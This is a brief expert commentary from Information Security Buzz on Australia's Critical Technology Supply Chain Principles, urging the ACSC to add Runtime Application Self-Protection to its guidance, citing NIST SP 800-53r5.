The Australian Government has released the Critical Technology Supply Chain Principles this week and below is the reactive commentary from information security experts.
<p>In the US, the National Institute of Standards and Technology (NIST) has recognised that many security controls fail to address the challenge of mitigating software supply chain attacks. It determined that only runtime protection prevents these stealthy attacks and <a href=\"https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf\" data-saferedirecturl=\"https://www.google.com/url?q=https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf&source=gmail&ust=1637152099931000&usg=AOvVaw1cR1q5wkJPPnB_Gi-asaGZ\"> recommends Runtime Application Self-Protection (RASP)</a> as a control to respond to emerging threats from the software supply chain. If the Australia Government wants to further mitigate supply chain risk it should consider adding RASP as a control in existing advice issued by the ACSC such as the Information Security Manual (ISM), the Cyber Supply Chain Risk Management Framework, or the Essential Eight.</p>
Information Security Buzz (aka ISBuzz News) is an independent resource that provides the experts comments, analysis and opinion on the latest Information Security news and topics